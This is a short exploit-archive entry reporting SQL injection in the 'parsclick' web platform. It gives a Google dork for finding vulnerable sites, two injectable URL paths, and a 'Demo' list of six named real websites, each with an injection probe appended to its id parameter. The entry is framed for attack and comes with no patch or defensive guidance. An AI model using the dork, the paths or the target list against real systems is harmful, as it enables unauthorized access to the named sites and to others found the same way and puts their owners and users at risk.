parsclick SQL injection

2016.04.06

Credit: Amir.ght

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:"?id=" "طراحی و میزبانی: رسانه پرداز پارس"

######################
# Exploit Title : parsclick SQL injection
# Exploit Author : Amir.ght
# Vendor Homepage : www.parsclick.com
# Google Dork : inurl:"?id=" "طراحی و میزبانی: رسانه پرداز پارس"
# Date: 2016 April 4
# Tested On :Windows 7 / Firefox
######################
# Path Of Vulnerability:
# 1- products/category.php?id=[sqli]
# 2- generate_page/?id=[sqli]
###################################
# Demo:
# http://pouyeshchap.com/generate_page/?id=15'
# http://www.avam-mk.com/fa/products/category.php?id=15S'
# http://www.sinarad.com/products/category.php?id=11'
# http://www.mtes.ir/products/category.php?id=72'
# http://www.chantiq.com/fa/products/product.php?id=161'
# http://ariamenswear.com/generate_page/?id=15'

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

parsclick SQL injection

Dork: inurl:"?id=" "طراحی و میزبانی: رسانه پرداز پارس"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.